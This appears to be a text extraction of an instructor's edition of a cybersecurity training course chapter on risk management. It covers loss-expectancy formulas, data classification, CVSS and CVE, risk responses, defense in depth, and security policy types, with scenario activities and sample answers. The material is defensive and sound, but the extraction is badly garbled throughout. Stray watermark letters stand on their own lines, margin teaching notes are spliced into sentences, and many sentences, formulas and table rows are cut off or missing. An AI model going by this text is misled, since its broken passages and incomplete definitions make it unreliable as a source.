• How confident is the report of the vulnerability? Is it an established and tested approach?
• What could be the potential damage to the organization?
e
If, for example, your organization is a cloud provider with multiple sites worldwide, your analysis
ut
should focus on the chances of an attack succeeding, what an attack can compromise in terms of the
data you host and its availability to your customers, and how exactly an attack can be performed. In
this scenario, patches and software fixes may be irrelevant to stopping an attack, so you won't
ib
necessarily focus on that in your analysis. Likewise, you may be less concerned with the cost
effectiveness of any controls, since you have a considerable security budget.
tr
If your organization is small and has primarily local customers, you'll want to approach your analysis
differently. Cost effectiveness becomes a significant factor in security controls, as your budget will
is
likely be limited. Also, you may want to focus more on the damage an attack will do to your own
systems, since you're unlikely to have the amount of redundancy that a large organization will.
D
The point is, before you even begin your risk analysis, you should tailor it to your own situation to
maximize its efficacy and dispense with irrelevant factors.
Risk Determinations or
A significant part of risk assessment is determining just how certain risks can specifically impact the Risk Determinations
e
organization. Two influential factors in risk determination are the likelihood of threats and the Consider pointing out
magnitude of impact. that a lot of research and
at
• Discovering the threat's motivation, if it has any. What does an attacker stand to gain from SLE and ALE may not
conducting an attack? Note that some risks, like accidents and non-human factors (e.g., fires and be as easy as it looks.
floods) have no motivation. Consider placing these
up
• Discovering the source of the threat. Who is the threat? Is it an individual or a group? Where are formulas in a real-world
context for students. For
they from, and what is their experience?
example, what is the
• Determining the threat's annual rate of occurrence (ARO). How often does the threat asset value of their car,
successfully affect the organization?
D
A quantitative assessment of risk attempts to assign a monetary value to the elements of risk, as in expectancy for the risk
the following formula: of a car crash.
N
will be lost if the risk is realized. So, if an asset is worth $10,000, but an adverse event only leads to
half of that being lost, then SLE is $10,000 × .50 = $5,000.
D
If you know how many times this loss is likely to occur in a year, you can calculate the cost on an
annual basis:
SLE (Single Loss Expectancy) × ARO (Annual Rate of Occurrence) = ALE (Annual Loss
Expectancy)
The annual loss expectancy (ALE) value is calculated by multiplying an SLE by its ARO to
determine the financial magnitude of a risk on an annual basis. So, if the example from before is
likely to occur three times in one year, the ALE would be $5,000 × 3 = $15,000.
Note: The ALE may be a moving target, as threats cannot necessarily be quantified as occurring
annually, but rather on an individual basis. In addition, threats change over time.
e
Documentation of During or after a risk assessment, you may be called upon to document your findings. To be
ut
Assessment Results effective, these reports must answer the following questions:
• Who asked you to perform the assessment?
ib
Use this question to create a record of who asked you to conduct the assessment. This will help
you establish a clear authority in writing, especially if personnel changes or if the business is
restructured during the assessment.
tr
• What were you asked to do?
is
Use this question to make clear exactly what you were told to assess. Going beyond the scope of
the assessment or failing to assess every element expected of you could impact your overall
conclusions.
D
• What did you assess?
Specifically mention any technological, administrative, or operational processes you assessed. It's
This is where you outline your assessment methodology so the audience of your report can verify
e
the assessment's results as accurate and useful.
at
steps you took earlier. Make sure to write clearly and consider the target audience's aptitude in
technology and business operations.
• What does it all mean?
up
This last question prompts you to piece all your findings together to offer a conclusion. What do
you believe happened, how did it happen, and who do you think is responsible? You cannot
necessarily rely on the audience of this report to draw their own conclusions; they'll likely be
looking for you to do that so they can verify the validity of those conclusions. Although these
D
conclusions may be subject to bias, if you support them with evidence, the arbiter(s) of the case
will be more inclined to agree.
ot
• Consider how practices like remote work and BYOD may impact your organization's network
perimeter.
• Consider how internal and external compliance, internal and external client requirements, and
audit findings influence risk.
• Determine how risks can affect the CIA of specific systems in your organizational environment.
• Determine what a threat is, where it comes from, and what risk it poses to the organization.
• Calculate the SLE and ARO of a threat, and then use the product of these two values to obtain
your ALE.
• Document your assessment results clearly and comprehensively.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 1-2
Assessing Risk
Scenario
e
Now that you're aware of the importance of risk management, you'll want to begin by assessing risk
at Develetech to get a better picture of just how the business currently fares during its expansion.
ut
You'll also gain an understanding of how the evolving nature of technology will affect Develetech in
the future, and what sort of unique challenges this poses to your risk management strategy.
ib
Assessing risk on an organizational level will enable you to later address and mitigate those risks.
Activity: Assessing Risk
tr
1. Develetech is a U.S.-based company, but it does business all around the
world.
is
What laws and regulations might Develetech be subject to?
D
A: Answers will vary, but among those discussed in this topic, Develetech is likely subject to U.S.
laws like SOX and CAN-SPAM. Develetech probably doesn't handle health records, so HIPAA is
unlikely to be relevant. Develetech is also likely subject to GDPR since it does business all over
2.
or
the world, including the European Union.
How will both internal and external compliance factors influence your risk
assessment?
lic
A: Answers may vary. Your internal staff needs to comply with your risk management plan once it
has been put in place. This usually means training certain staff is required; otherwise, they might
not be properly equipped to meet compliance requirements. Because internal users access your
systems constantly, they can bring a great deal of risk. Externally, your organization must comply
up
with all applicable laws and regulations. Even failure to comply with non-legally binding, industry-
accepted standards may place your organization's finances or reputation in jeopardy. However,
external compliance will not guarantee security. You may find that your risk is still too high even
though you adhere to security requirements.
D
TOPIC C
Mitigate Risk
After assessing how particular elements in your operations can bring risk to the organization, you're
ready to actively respond to those risks. Mitigation is all about balancing your response capabilities
with your tolerance for risk, and there are several different approaches that may work best for you.
e
As an information assurance professional, you'll choose the most appropriate mitigation strategy to
keep your organization as safe from harm as possible.
ut
Classes of Information
ib
When developing a risk mitigation strategy, you need to classify the information that needs to be Classes of Information
protected. The requirements to protect information will differ between jurisdictions, so you must
tr
There are several
examine the applicable regulatory requirements to ensure the classification takes this into account. different classification
Some information is more or less critical than other types. In addition to meeting compliance schemes, and students
is
requirements, classifying information can also help you determine what controls to apply. may be more familiar
with others. Consider
In general, there are four classes of information that organizations use:
D
asking students about
• Public information, which presents no risk to an organization if it's disclosed, but does present a their experience with
risk if it's modified or not available. information
classification, and
it, if it were modified, or if it were not available. or
• Private information, which presents some risk to an organization if competitors were to possess
• Restricted information, which might be limited to a very small subset of the organization
primarily at the executive level (e.g., corporate accounting data), where unauthorized access to it
incorporate their
answers into the rest of
the subject matter.
e
might cause a serious disruption to the business.
at
• Confidential information, which would have significant impact to the business and its clients if
it were disclosed. Client account information like user names and passwords, personally
identifiable information (PII), protected health information (PHI), payment card information/
lic
cardholder data (CHD), and personal data covered by the UK's Data Protection Act would be in
this category.
up
D
ot
N
o
D
e
• Top Secret
• Secret
ut
• Confidential
• For Official Use Only
ib
Executive Order 13526 outlines these classification levels and can be viewed at https://
www.archives.gov/isoo/policy-documents/cnsi-eo.html.
tr
UK Government Classification System
is
In the UK, a similar classification system is implemented. The UK government policy describes how
it classifies information to ensure it is appropriately protected, supports public sector business and
the effective use of information, and meets the requirements of relevant legislation and
D
international/bilateral agreements and obligations. As with the U.S. system, the classification is
determined by the likely impact resulting from compromise, loss, or misuse of the information and
the need to defend against a broad profile of threats. For each classification, there is a set of baseline
or
personnel, physical, and technical controls considered to provide an appropriate level of protection
against a defined "typical" threat level. From most restrictive to least, the UK government levels of
classified information are:
e
• Top Secret
• Secret
at
• Official
The published UK policy on classification levels can be viewed at https://www.gov.uk/
lic
government/publications/government-security-classifications.
Classification of Information is not categorized by access levels only; it can also be thought of in terms of how a
Information Types into compromise of that information can negatively impact the three core security attributes of the
D
CIA Levels confidentiality, integrity, and availability (CIA) triad. When surveying information within an
organization, it is important not to solely judge the type of information, but how that information is
used throughout the business as well. Public information, if disrupted, wouldn't necessarily cause
ot
not just the domain of from the U.S. Central Intelligence Agency.
security, but also
D
includes operational
departments.
e
ut
ib
tr
is
D
Figure 1-5: The CIA triad.
Example
or
Imagine a large outsourcing company that runs payroll applications for its clients. This outsourcing
provider would have massive quantities of confidential information, including names, addresses,
e
bank account and routing numbers, Social Security numbers, and tax return data. It may also have
self-administered health plan data that would be classified under HIPAA as PHI, bringing a
at
size of the company and there would be little to no required uptime to support it. By comparing
these two companies, you can see how organizational perspective and scope can increase or
decrease the risks associated with different types of data. While penalties and liability associated with
up
a confidentiality and integrity breach of the payroll records would affect either organization, the
outsourcing provider has significantly more at stake. Not only would brand damage result from the
outsourcing provider's exposure or loss, but they would also lose immediate income through the
refund component of their service-level agreement (SLA).
D
The smaller organization may be penalized for exposing data or failing to protect it from tampering;
however, compared to the larger payroll provider, the smaller organization has less at stake.
ot
Many of your risk mitigation efforts will be put in motion by the various security controls you Security Control
implement. These controls will come in many different forms and have many different functions. Categories
o
The three main categories of security controls are as follows: The following
information should serve
• Technical
D
• Administrative
Administrative controls, also called management controls or operational controls, monitor
an organization's adherence to security policies and procedures. For example, a regularly
scheduled security scan and audit to check for compliance with security policies is a type of
administrative control.
A large part of evaluating and mitigating risk in the organization is to review the effectiveness of
existing controls from all these categories, as well as any controls the organization may consider
adding to its risk management program.
e
Control Selection Based on CIA Requirements
ut
Technical Controls Once a specific risk has been quantified, it is possible to determine the best approach to mitigating
ib
(Template) the specific risk through various controls. Risks can be mitigated based on the specific CIA attribute
Technical Controls targeted, and the technology used to reduce the risk does not always cover all three attributes.
(Example Answer) Consider the following table, in which examples of technical controls are reviewed and selected in
tr
Use the template slide to terms of how they do or do not uphold the CIA principles.
prompt students to
is
provide their own Technical Control Upholds Upholds Integrity? Upholds
answers. Use the next Confidentiality? Availability?
slide to provide an
D
example of how they User permissions for Yes, by keeping No No
could fill in the table. network share unauthorized users
from accessing shared
have capacity
Message authentication No Yes, by comparing the expected No
lic
As you can see, no single technology in this list of examples addresses all three attributes. An
organization has well-rounded security when it specifically upholds all three components of the CIA
triad. Keep in mind, however, that CIA attributes are not the only criteria by which you can select
the optimal controls for your organization. Ultimately, your organization must define which
D
parameters it needs to uphold to mitigate risk, and this will drive your process for selecting the right
controls.
ot
and access control. In both cases, the goal is to limit the readability of data to only authorized
parties. What you implement will depend on your needs as an organization. Access control may be
enough to keep unwanted users from accessing somewhat sensitive data, but in scenarios where data
o
is much more sensitive, you may want to aim for encryption to achieve the strongest confidentiality
assurances.
D
Controls to address risks to integrity primarily rely upon data validation and auditing. This includes
the use of read-only data stores and strong authentication controls in applications using multiple
factors. Auditing controls function by monitoring the integrity of the data as it exists in the system
and as data is passed through input and output routines. Auditing is a useful policy for essentially all
organizations, though it isn't as active in maintaining integrity as forms of validation like hashing.
e
Risk Scoring Systems
ut
Once information critical to the business has been classified by the risk associated with its CIA Risk Scoring Systems
attributes, and stakeholder input and technical controls are considered in the context of the CIA
ib
triad, it is possible to develop risk scores for the data. This is done subjectively and is based on a
sliding scale of harm to the business.
tr
One example is to rate the highest risks a 10, the lowest risks a 1, and the lack of risk a 0. These
values are typically assigned by the information owner or a cybersecurity practitioner charged with
evaluating risk. This is a simple method of scoring that can be useful at the preliminary stages of risk
is
management, but you should eventually rely on more sophisticated scoring systems that can more
precisely quantify risk. There are several such scoring systems accepted by the cybersecurity
D
community, and some of them have overlapping methodologies. There is not one authoritative
source of record for all risks.
The value of any scoring system is to rank the severity of risks so that you can more confidently
or
prioritize some risks over others. By prioritizing risks and your responses to them, you will be more
effective at reducing their likelihood and impact than if you chose to address the risks in an arbitrary
order or by the order in which they are identified.
e
Articulate Risks Using Business Language
at
To ensure the business stakeholders understand the risks, in addition to calculating risk scores, you
should articulate the risk in business language such that the cause and effect can clearly be
lic
understood by the business owner of the asset. For example, a risk of a denial of service (DoS)
attack should be put into plain language that describes how the risk would occur and as a result what
access is being denied to whom and the effect to the business. For instance: "As a result of
up
malicious or hacking activity against the public website, the site may become overloaded, preventing
clients from accessing their client order accounts. This will result in a loss of sales for n hours and a
potential loss of revenue of n dollars."
D
Common Vulnerability
Most vulnerabilities today are rated using the Common Vulnerability Scoring System (CVSS). Scoring System (CVSS)
The CVSS is a risk management approach where vulnerability data is quantified and then the
N
degrees of risk to different types of systems or information are taken into account. Since it is an
open source formula for risk quantification, the CVSS is easily modified to fit a specific
organization's needs. The CVSS is similar to the examples used previously, but it is much more
o
granular.
The system consists of the three core metric groups (and their associated sub-metrics): base metrics
D
e
Integrity impact
ut
Availability impact
Scope
ib
Time permitting, The strength of the CVSS is that it produces consistent results for the vulnerability's threat in the
consider demonstrating base and temporal metric groups, while enabling organizations to match those results with their
tr
the CVSS calculator. specific computing environment. You can do this by using the CVSS calculator (available at
https://nvd.nist.gov/cvss.cfm?calculator&version=3.1) and plugging in your own metric
is
values.
D
Common Vulnerabilities and Exposures (CVE)
Common Vulnerabilities The CVSS is used to score vulnerabilities in the Common Vulnerabilities and Exposures (CVE)
and Exposures (CVE)
or
system, a public dictionary of vulnerabilities that facilitates the sharing of data among organizations,
security tools, and services. In a sense, the CVE normalizes data about a vulnerability so that fixing
or mitigating the issue is less of a challenge. The CVE is maintained by the non-profit MITRE
Corporation and receives funding from the U.S. Department of Homeland Security.
e
There are several elements that make up a vulnerability's entry in the CVE:
at
• Each vulnerability has an identifier that is in the format: CVE-YYYY-####, where YYYY is
the year the vulnerability was discovered, and #### is at least four digits that indicate the order
lic
e
ut
ib
tr
is
D
or
e
Figure 1-6: CVE-2021-34527, which details a vulnerability in the Windows Print Spooler service
at
that enables an attacker to execute arbitrary code on a target host. This vulnerability, along with
its privilege escalation variant CVE-2021-1675, were dubbed PrintNightmare.
lic
Note: Although the CVE is very useful for identifying weaknesses in your systems, in some
circumstances, you may be unable to replicate the vulnerability.
up
reference.
• CVE site: https://cve.mitre.org/
N
The National Vulnerability Database (NVD) is a more robust superset of the CVE maintained
by NIST. The NVD uses the CVSS to assess vulnerabilities. It is available at: https://
nvd.nist.gov/.
e
response technique. to zero). This is generally achieved by terminating the process, activity, or
ut
application that is causing the risk. For example, if you do not need a chat
program to facilitate collaboration among employees, you might simply
block access to it from within your systems, thus eliminating the risk it
ib
brings. Total risk avoidance is virtually impossible in any organization, as
it would necessitate that you remove many vital systems your business
requires to function.
tr
Transfer Risk transference moves the responsibility for managing risk to another
is
organization, such as an insurance company or an outsourcing provider.
This external organization takes over and maintains the risks associated
with data and other resources. Examples include purchasing natural
D
disaster insurance to cover servers and the data present on them, and
relying on cloud providers to store and secure data. You should choose
the transference approach if the risks become larger and more
Mitigate
operations. or
complicated than your organization can manage without impeding your
analyzes a risk, and then determines that the risk is within the
organization's appetite and no additional action is needed. The risk
management plan that an organization develops and implements will
outline its risk appetite, so any risks that are accepted are within the
D
what level of risk is unlikely or does not have enough potential for harm
to warrant extra effort and cost.
N
Note: Ignoring risk is not the same as accepting it. When you accept a risk, you have evaluated it
and decided not to transfer, reduce, or avoid it. When you ignore risks, you do not take the time
o
to identify and evaluate them. Ignoring risks is a dangerous approach to take, and can lead to
unforeseen disasters.
D
Note: Some responses will incorporate more than one technique. For example, you can begin to
mitigate risk until it reaches an acceptable level, at which point you accept that risk.
e
Communicating Recommendations for Mitigating Risk
ut
Unless you're fully in charge of making risk management decisions, you'll likely need to get approval Communicating
before you (or anyone else on your team) starts responding to risk. Whether it's your immediate Recommendations for
Mitigating Risk
ib
manager or someone higher up, you need to communicate recommendations to an audience that
can sign off on them. Remember, it's important to put risk in the context that business leaders can
understand—i.e., how it affects business operations, revenue, productivity, etc. The same goes for
tr
mitigation tactics. How will the tactics you recommend save the organization time and money? How
will not implementing the mitigation tactic, or implementing some cheaper tactic, cause problems?
is
The decision makers need to be convinced of its cost effectiveness, not just its technical
effectiveness.
D
However, there are situations where going through the normal channels and/or process to obtain
approval is just not feasible. Consider that there's an imminent attack on your systems and network
and every second counts. You don't have time to wait for the top-level management to meet and
or
discuss the issue at hand. This is where incorporating levels of authority into a risk management plan
is crucial.
Levels of Authority
e
at
Levels of authority determine what responsibility someone has to act. One common hierarchy has Levels of Authority
four levels:
lic
1. Act from instruction. The individual acts only when instructed to by other decision makers.
2. Act after approval. The individual is able to evaluate the situation themselves, but must still wait
for approval before acting.
up
3. Decide, inform, and act. The individual is able to act without obtaining approval, but they
must still notify a decision maker promptly.
4. Decide and act. The individual has the power to act with complete independence.
As an individual's knowledge, skills, and experience grow, so too does their level of authority.
D
However, the needs of the organization in an emergency are also important factors that can
temporarily change one's level of authority. If a skilled incident responder detects a potentially
ot
devastating attack in progress, they may have the authority to "decide, inform, and act" as stipulated
in the existing incident response plan. In a normal scenario or in response to a minor incident, they
may only be allowed to "act after approval."
N
Continuous monitoring and improvement is the process of detecting changes in an environment Continuous Monitoring
and then quickly and efficiently addressing them. Since risk is always changing within an and Improvement
D
organization, the organization must continually evaluate its networks to ensure that implemented
controls are operating as intended. A good example of this is the use of patch and vulnerability
management software. Since new vulnerabilities are found regularly, and new patches are released
for those vulnerabilities, organizations should expect to have a recurring process to update
equipment. However, it is very time consuming to quantify the recurring change in an organization
with a regular risk assessment approach.
When risk is mitigated under a program of continuous monitoring and improvement, the business
will be able to bolster its operational processes and cut down on costly risk assessments. There are
software tools that provide this functionality by alerting security staff of unanticipated resource
access, invalid or expired software licenses, and mobile devices that attach to the network from
anywhere and at any time.
e
Control identify whether or not it complies with a set of requirements and expectations. These requirements
ut
and expectations can be driven by customers and other stakeholders, or they can be driven by
internal and external compliance factors, such as industry regulations and company-defined quality
standards. Ultimately, an organization may choose to put its products and services through the
ib
verification and quality control processes to help mitigate financial, brand-based, and other risks that
come with pushing a poor-quality, unverified product to market.
tr
The following table lists some of the common strategies for verification and quality control.
Verification/Quality Description
is
Control Strategy
D
Evaluation/assessment Evaluation and assessment strategies typically involve identifying the state
of an organization's products and services. This helps the evaluator spot
problem areas and suggest potential corrective actions.
Auditing
or
Auditing is similar to evaluation and assessment strategies, but it takes a
more rigid approach to reviewing the organization. The auditor has a
predefined baseline they compare the organization's current state to,
which helps the auditor identify any specific violations that require
e
remediation.
at
Maturity model Maturity models review an organization against expected goals and
implementation determine the level of risk the organization is exposed to based on the
lic
Defense in Depth
Defense in Depth In a defense in depth strategy, the organization assumes that no amount of comprehensive security
o
controls will truly be achievable, and that risk cannot be totally avoided. Therefore, a defense in
depth approach positions the several layers of security as if they were roadblocks. Each layer is
D
intended to reduce risk rather than eliminate it outright. This way, the risk loses its impact, or the
risk itself becomes much more easy to manage and mitigate. Additionally, instead of just focusing on
the tools used to protect the network and its systems directly, defense in depth is used to plan
personnel training, policy adoption, physical protection, and other, broader security strategies.
The following table lists some of the high-level components that make up a defense in depth
strategy.
Component Description
Personnel Your personnel are simultaneously the most powerful force for security in
your organization and its biggest vulnerability. A defense in depth strategy
sees that personnel undergo security training that is relevant to them. In
addition, you need to enforce certain best practices, like cross-training
personnel for similar functions in case one team member can no longer
fulfill their duties; mandating that a certain process is under dual control
so no one person can make a snap decision; describing how personnel
e
can or cannot share information with third-party consultants;
implementing a succession plan for personnel that move to other roles or
ut
leave the company; and more.
Processes As you've seen, processes must undergo continual improvement to truly
ib
be effective. A defense in depth program will schedule routine tests and
reviews to see if these processes comply with verification standards.
Likewise, you'll need a plan for retiring processes that no longer meet
tr
standards and cannot be improved upon.
is
Technologies There's certainly no shortage of technological solutions that can fit into a
defense in depth program. Some of the most significant include security-
focused appliances like intrusion detection and event management
D
systems; security suites like penetration testing platforms; cryptographic
solutions that ensure the confidentiality of data both stored and
transmitted; and many more. Most effective solutions are capable of
or
automatic reporting so that security personnel are alerted to problems as
quickly as possible. In cases where acquiring and maintaining security
solutions are beyond the organization's capabilities, they can still
outsource this component of defense in depth to a cloud-based Security
e
as a Service (SECaaS) provider.
at
Architecture design The design of the organization's network architecture plays a vital role in
any defense in depth strategy. How a network is designed in terms of its
lic
topology, both physical and logical, can have a strong effect on risks that
face the organization. One major architectural design strategy involves
segmenting the network into multiple sub-networks so that a compromise
of one segment does not necessarily mean it will spread to the rest of the
up
network.
Note: Defense in depth comes from the military strategy of arranging defensive lines or
D
fortifications so they can defend each other, particularly if there is an enemy incursion through
one of the lines of defense.
ot
N
o
D
e
ut
ib
tr
is
D
Figure 1-7: An example of a defense in depth strategy.
• Categorize information into classes like public, private, restricted, and confidential.
• Classify information in terms of how it will impact your organization's CIA.
• Incorporate stakeholder input for CIA-based decisions.
up
• Put products and services through verification and quality control processes.
• Adopt a defense in depth strategy for layered risk mitigation.
N
o
D
ACTIVITY 1-3
Mitigating Risk
Scenario
e
Your team at Develetech has been busy assessing the various risks that could affect the company.
Now it's time for you to analyze these results and respond appropriately. Choosing the right risk
ut
mitigation strategies is essential in meeting stakeholder expectations and keeping your systems
secure at the same time.
ib
Activity: Mitigating Risk
tr
databases. This will help uphold availability because you will be able to
quickly and easily restore the backed up copy, and it will also help uphold
is
integrity in case someone tampers with the database.
D
What controls can you implement to round out your risk mitigation strategy
and uphold the components of the CIA triad?
or
A: Answers will vary, but a strong way to secure confidentiality is through encryption. Encrypting the
database will deter unauthorized users from making sense of the stored data. You could also
implement access control to prevent an intrusion before it even begins. This will keep your
databases out of the hands of an attacker. In addition, you can implement physical security
e
measures in case an attacker has in-person access to these databases.
at
2. During their risk assessment, your team has identified a security flaw in an
application your organization developed.
lic
To conduct a proper analysis of how this could bring risk to your organization,
what are some of the questions you need to ask?
up
A: Answers will vary, but you should ask how easily exploitable the flaw is, and what the scope of an
exploit could be. Can an exploit expose confidential information? Can it crash the app or otherwise
render other systems unavailable? What attack vectors exist that could allow an attacker to carry
out this exploit? What mitigation plans, if any, are in place to address this flaw? How easily and
D
quickly can you patch the flaw, and how will you deploy it so that all of the app's users are
covered?
ot
N
o
D
3. You've analyzed the application flaw and discovered that it could allow an
unauthorized user to access the customer database that the app integrates
with, if the app uses poor input validation. The attacker could glean
confidential customer information, which would have a high impact on your
business. However, you determine that your app's current input validation
techniques account for all known exploits of this kind.
How will you respond to this risk?
e
A: The answer is debatable and may require more careful analysis. However, some may argue that
the strong input validation controls already in place imply that you should just accept the risk and
ut
save yourself the time, effort, and cost of an active response. Others will say that this is
inadequate because it only accounts for known values, and that an attacker could find a way
around the validation. This would necessitate a response like mitigation, in which more application
ib
security controls are implemented to harden the app against attack. Some might suggest
transferring the risk to another organization that can provide more reliable security. Some might
even argue that the risk to your customers' confidentiality is too great, and that you should avoid
tr
the risk entirely by dropping the internally developed app and using a different solution.
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC D
Integrate Documentation into Risk Management
A less direct, but still important, part of risk management is developing documentation for future
reference. Writing a policy and recording risk-related activity will move your risk management
strategy from the conceptual to the concrete. This will provide the foundation on which to support
e
your assessment and mitigation practices.
ut
From Policies to Procedures
ib
A policy identifies the organization's intentions. Policies are interpreted and made operational From Policies to
through standards, guidelines, and procedures. In regard to cybersecurity and compliance, these Procedures
terms are used as follows:
tr
Consider generating
discussion about
• Policies are high-level statements that identify the organization's intentions.
students' experiences
is
• Standards consist of specific low-level mandatory controls that help enforce and support with each type of
policies. document. You may also
• Guidelines are recommended, non-mandatory controls that support standards or that provide a want to discuss how
D
reference for decision making when no applicable standard exists. some organizations
consolidate these
• Procedures are step-by-step instructions on tasks required to implement various policies,
different types of
standards, and guidelines.
or documents into a single
document.
e
at
lic
up
D
ot
N
Figure 1-8: Policies are the foundation upon which standards, guidelines, and procedures are
o
built.
D
Processes
Processes are also components of documentation. They describe at a high level how actions can
achieve desired goals. This makes them distinct from procedures as they are not focused on specific
steps or instructions to be carried out, but rather an overall chain of activities. They do not fit within
any specific spot of the hierarchy as shown in the figure, as they can be included at any point. In
other words, policies can include language that defines processes. Standards, guidelines, and
procedures can all reference processes in different ways. Cybersecurity, like most technical business
functions, involves many processes.
e
of the reasons for its development, ultimately, the policy must be approved by executive
ut
management, and in some cases the board of directors, should the organization be large enough.
Once the organization has identified a need, there are several ways to begin crafting a policy. One of
the easiest methods is to download a free policy template available from various security
ib
organizations, and then customize the policy to fit your organization. It is also common for
organizations to bring in a security consulting company to aid them in policy development.
tr
Regardless of how you approach your company's policy, it is important to also compare and contrast
the company's policy with those of other organizations. There may be topics or risks you did not
previously consider that affect the elements of the policy.
is
Not all policies are created equal. It is best to use clear and concise language within the policy that is
easy to understand. In other words, attempt to limit the legalese that pervades many policies. At the
D
same time, it is important to understand the organization's information security policy is a legal
document, which you may provide to employees, customers, and in some cases, a court of law.
or
In conjunction with any laws or regulatory requirements the organization may be under, you must
include business leaders in the development of the policy. If a policy is too strict, it may impair
workers' ability to conduct business, which in turn impairs the organization. A well-developed policy
should address all the risks the business may face. It is a living document that should be updated
e
regularly as the business, technology, environments, and risks in an organization change. When
emerging risks are identified, your policies should clearly state when to report an incident and whom
at
to report the incident to. Not all incidents require legal action, so it's necessary for the policy to
cover when to report to law enforcement versus when to report to internal staff only.
lic
up
D
ot
N
o
D
e
ut
ib
tr
is
D
Figure 1-9: An example security policy.
include the steps to implement and enforce the policies. They must be specific enough so that any
user who is expected to follow them can, regardless of their technical knowledge. If a predetermined
level of technical prowess is required, then that should be explicitly stated. For example, a data
up
handling procedure designed to be used by system administrators may make the assumption that the
administrators are familiar with the platform they are supporting; however, a similar procedure
designed for marketing and sales employees who have less technical familiarity may need more in-
depth and explicit steps.
D
The style and contents of these documents will also vary considerably between commercial
organizations and government bodies. It is common for documents relevant to military or similar
agencies, such as emergency services, to be more prescriptive than those for standard businesses. In
ot
other words, you must understand your target audience and tailor the procedures appropriately.
Procedure development is done in much the same way as policy development. Many standards
N
organizations such as NIST or CIS have predefined procedures or standards documents that you
can use as a starting point, and then you can tailor them to fit your organization. Certain
organizations will have specific types of standards they need to write to. Alternatively, you can bring
o
in consultants to help define procedures to make them compliant with particular policies. Regardless
of the approach, it is always a good idea to compare and contrast policies with other organizations
D
to see how they are implementing the "how-to" of information security. Many organizations, both
commercial and governmental, publish their key policies online to enable potential users of their
services to understand and gain confidence in how the organization manages information.
Just like the policies on which they are based, procedures are living documents. If a policy changes
in light of new business, technological, or environmental changes, then so too should procedures. A
policy that updates the organization's security posture in the face of new threats and risks is useless
unless it is translated into practice through procedural documentation.
e
ut
ib
tr
is
D
or
Figure 1-10: An example of a procedure document.
e
Topics to Include in Security Policies and Procedures
at
Topics to Include in All information security policies and procedures contain topics specific to an organization and its
Security Policies and requirements; however, there is a recommended list of topics that your security policies and
lic
Procedures procedures documentation should include. As you draft the documentation, be sure to obtain the
approval and buy-in from top management for the following:
up
Best Practices to
Incorporate in Security Best Practices to Incorporate in Security Policies and
Policies and Procedures
Procedures
o
ramifications of
incorporating these best Additionally, you should support the development of policies and procedures that contain the best
practices in security practices listed in the following table. Note that the organization will not necessarily be able to, or
policies and procedures, should not, incorporate all of these practices in the risk management process.
such as a loss of
productivity due to
practices like mandatory
vacation and job
rotation.
Separation of duties States that no one person should have too much power or responsibility.
Duties and responsibilities should be divided among individuals to
prevent ethical conflicts or abuses of power. Duties such as authorization
and approval, and design and development, should not be held by the
same individual because it would be far too easy for that individual to
defraud or otherwise harm an organization. For example, it would be
easier for an employee to make sure the organization only uses specific
e
software that contains vulnerabilities if they are the only one with that
responsibility.
ut
In many typical IT departments, roles like backup operator, restore
operator, and auditor are assigned to different people.
ib
Job rotation States that no one person stays in a vital job role for too long. Rotating
individuals into and out of roles, such as the firewall administrator or
tr
access control specialist, helps an organization ensure it is not tied too
firmly to any one individual because vital institutional knowledge is
is
spread among trusted employees.
Job rotation also helps reduce the risk of individuals abusing their power
D
and privileges, as well as preventing collusion between employees.
Mandatory vacation A method of preventing fraud that provides you with an opportunity to
review employees' activities. The typical mandatory vacation policy
or
requires that employees take at least one vacation a year in a full-week
increment so that they are away from work for at least five days in a row.
During that time, your corporate audit and security teams have time to
e
investigate and discover any discrepancies in employee activity.
When employees understand the security focus of the mandatory vacation
at
access necessary for them to perform the duties required. This level of
minimal access includes facilities, computing hardware, software, and
information. When a user or system is given access, that access should
up
still be only at the level required to perform the necessary tasks. If you
give a user or system access that exceeds what they require, then that is
one more vector that can be used to compromise your organization.
D
Incident response Defines monitoring, response, and reporting requirements for incidents
that involve security breaches or suspected breaches. Generally, this set of
policies requires a response to all incidents and suspected incidents within
ot
desk or help desk being the first line in the reporting hierarchy. Without
timely reporting to the right people, it will be much more difficult to
D
e
Employment and Defines on-boarding and off-boarding procedures when employment
ut
termination procedures begins and concludes, respectively. Proper on-boarding involves
acclimating new employees to the security practices that you expect them
to follow. This ensures there will be an expectation of liability in the
ib
arrangement. Likewise, when the employee leaves the organization, you
should establish an off-boarding process. The terminated employee must
agree to relinquish any access to company systems, data, and physical
tr
equipment.
In some cases, terminating an employee may put your company secrets in
is
risk of being leaked; to prepare for this, your policy should specify when
you should enforce non-disclosure agreements (NDAs).
D
Continuous monitoring Outlines what mechanisms and tools are used to continuously monitor
systems for changes that could increase risk to the organization. This
or
practice also defines exactly what events and environments should be
monitored based on a prior risk analysis. Some policies will include
provisions for continuous improvement so that the organization can take
a proactive role in addressing detected risks.
e
Training and awareness Without comprehensive education, user-based attacks, such as social
at
for users engineering, will be a major source of risk for an organization. In addition
to teaching users about the inherent risks of using technology, it is
important to also educate them on the policies and procedures required
lic
injection attacks, but you would educate your website developers on this
topic.
Specific training mechanisms can range from subtle reminders through
D
Auditing requirements Defines the types of audits performed, who performs those audits, and
and frequency how frequently they are performed, and clearly delineates the authority
N
The audit policy should also define the auditing requirements for business
partners and subcontractors, which should be included in all contracts
D
with third parties who could have an impact on the overall security of the
organization.
e
Types of Policies
ut
The following table includes examples of common security policies found in many organizations. Types of Policies
ib
Policy Description
Acceptable use policy Defines a set of rules and restrictions for how various internal and
tr
external stakeholders may behave with respect to the organization's
assets. These policies typically outline general or specific behaviors the
is
organization believes will either reduce, increase, or have no effect on
risk. In most cases, stakeholders are expected to comply with an
acceptable use policy, and if they violate any of its terms, may be subject
D
to punitive actions (e.g., employment termination).
Account Outlines the responsibilities administrators have in keeping various
management policy
or
identity data secure and supportive of business objectives. Such policies
define expected behavior in how an external or internal user's identity is
created, altered, and deleted with respect to organizational systems.
e
Password policy A subset of account management policies that defines rules for how users
generate and maintain account credentials. It typically sets restrictions
at
attempts.
Data ownership Outlines how information in the organization is assigned to "owners"—
up
policy that is, personnel who are ultimately responsible for keeping that
information secure and accessible by authorized parties only. These types
of policies help an organization ensure that all data is accounted for and
that each owner understands what is expected of them.
D
Data classification Outlines how an organization chooses to categorize the different levels of
policy data sensitivity. The organization can triage its security efforts based on
ot
what data will bring the most risk if it were leaked or tampered with.
Data retention policy Stipulates how and when an organization should store data within its
systems, and how and when the organization should purge that data. This
N
